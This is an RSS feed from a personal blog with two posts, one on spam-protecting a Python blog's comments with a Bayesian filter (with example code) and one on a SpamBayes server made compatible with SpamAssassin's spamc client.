<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; bayesian</title>
	<atom:link href="http://www.larsen-b.com/tags/bayesian/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>How to spam-protect your Python-based blog with a Bayesian filter</title>
		<link>http://www.larsen-b.com/Article/244.html</link>
		<comments>http://www.larsen-b.com/Article/244.html#comments</comments>
		<pubDate>Fri, 17 Nov 2006 19:57:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[bayesian]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Like several other people, I ran into trouble with spammers using my comment system to post spam and backlinks (some even use funny tricks). I&#8217;m already using a good email spam filter, SpamBayes, so I decided to test Bayesian &#8230; <a href="http://www.larsen-b.com/Article/244.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Like several other people, I ran into trouble with spammers using my comment system to post spam and backlinks (some even use funny <a class="reference" href="http://www.larsen-b.com/Article/239.html">tricks</a>).</p>
<p>I&#8217;m already using a good email spam filter, <a class="reference" href="http://www.larsen-b.com/Article/112.html">SpamBayes</a>, so I decided to test Bayesian filtering on this blog&#8217;s comment spam too.</p>
<p>I decided to give <a class="reference" href="http://divmod.org/trac/">Reverend</a> a try:</p>
<pre class="literal-block">from reverend.thomas import Bayes

SPAM_DB='spam.bayes'
guesser = Bayes()

# load the spam DB
try:
    guesser.load(SPAM_DB)
except IOError:
    print("Creating a new spam filter database")
    guesser.save(SPAM_DB)

def train_spam(text):
    guesser.train('spam',text)
    guesser.save(SPAM_DB)

def train_ham(text):
    guesser.train('ham',text)
    guesser.save(SPAM_DB)

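# Return the (ham, spam) scores for a text.
# guesser.guess() yields (label, score) pairs; a label that is
# missing from the result keeps a score of 0.
def guess(text):
    spam = 0
    ham = 0
    for label, score in guesser.guess(text):
        if label == 'ham':
            ham = score
        elif label == 'spam':
            spam = score
    return (ham, spam)</pre>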
<p>A small and really simple module, no? The next step is simply to add &#8216;spam&#8217; and &#8216;ham&#8217; attributes to your comment objects, plus two methods to train the filter on a comment as spam or as ham. And of course, only display comments with a good ham/spam ratio (&gt; 1). This took me about an hour to implement&#8230;</p>
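<p>The comment-side changes could be sketched roughly as follows. This is only an illustration under stated assumptions, not the code running on this blog: the Comment class and its method names are hypothetical, the guess, train_ham and train_spam helpers from the module above are passed in as arguments, and the fake_* functions are stand-ins so the sketch runs without Reverend or a saved database.</p>

```python
class Comment(object):
    """Hypothetical comment object carrying 'ham' and 'spam' scores."""

    def __init__(self, text, guess, train_ham, train_spam):
        # guess, train_ham and train_spam are the helpers from the module
        # above, passed in so this sketch does not import Reverend itself.
        self.text = text
        self._guess = guess
        self._train_ham = train_ham
        self._train_spam = train_spam
        self.ham, self.spam = guess(text)

    def mark_as_ham(self):
        """Train the filter on this comment as ham, then rescore it."""
        self._train_ham(self.text)
        self.ham, self.spam = self._guess(self.text)

    def mark_as_spam(self):
        """Train the filter on this comment as spam, then rescore it."""
        self._train_spam(self.text)
        self.ham, self.spam = self._guess(self.text)

    def is_visible(self):
        # ham/spam > 1 rewritten as ham > spam, which avoids dividing by
        # zero; a comment with no score yet (0, 0) stays hidden.
        return self.ham > self.spam


# Stand-ins for the real helpers (assumption, for demonstration only):
# they remember the last label given to a text instead of doing any
# Bayesian scoring.
_labels = {}

def fake_train_ham(text):
    _labels[text] = 'ham'

def fake_train_spam(text):
    _labels[text] = 'spam'

def fake_guess(text):
    label = _labels.get(text)
    return (1.0 if label == 'ham' else 0.0,
            1.0 if label == 'spam' else 0.0)


comment = Comment("Nice article!", fake_guess, fake_train_ham, fake_train_spam)
comment.mark_as_ham()
```

<p>Comparing the two scores directly, rather than dividing them, is a choice made for this sketch: it gives the same answer as a ratio above 1 whenever the spam score is non-zero, and it keeps a brand-new comment hidden until the filter has an opinion on it.</p>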
<p>After a week of training, this is working very well: not a single false positive, and it has filtered every spam since the first training runs. As I get around 20 spam posts per day, this is quite good news ;)</p>
<p><strong>Enjoy Bayesian ?</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/244.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>SpamBayes server compatible with SpamAssassin</title>
		<link>http://www.larsen-b.com/Article/112.html</link>
		<comments>http://www.larsen-b.com/Article/112.html#comments</comments>
		<pubDate>Sat, 24 Apr 2004 20:10:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Utils]]></category>
		<category><![CDATA[bayesian]]></category>
		<category><![CDATA[mail]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[sysadmin]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I&#8217;ve been using SpamBayes for a long time now. But when I decided to install it for all the current users of my setup (with some virtual domains), I discovered that SpamBayes doesn&#8217;t have a system-wide daemon like SpamAssassin&#8217;s (spamd). &#8230; <a href="http://www.larsen-b.com/Article/112.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ve been using SpamBayes for a long time now. But when I decided to install it for all the current users of my setup (with some virtual domains), I discovered that SpamBayes doesn&#8217;t have a system-wide daemon like SpamAssassin&#8217;s (spamd).</p>
<p>So the first try:</p>
<ul class="simple">
<li>install SpamAssassin :) .. This mail filter is just bullshit! Even after being trained on a mail, it still manages to deliver it as &#8216;unsure spam&#8217;!!</li>
<li>put SpamAssassin away .. but keep a piece of it :)</li>
</ul>
<p>I first decided to write another client/server for SpamBayes, but looking at everything written into spamc (the SpamAssassin client), I realized I would need a lot of nights (I&#8217;m not a C guru, even if the little attempt I wrote works perfectly).</p>
<p>Nice try, but why shouldn&#8217;t I simply write a server that uses spamc as its client? .. It could be really easy and efficient too (spamc is really efficient) ..</p>
<p>I just finished writing <a class="reference" href="http://mail.python.org/pipermail/spambayes-dev/2004-April/002748.html">this</a> and submitted it to the dev list.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/112.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
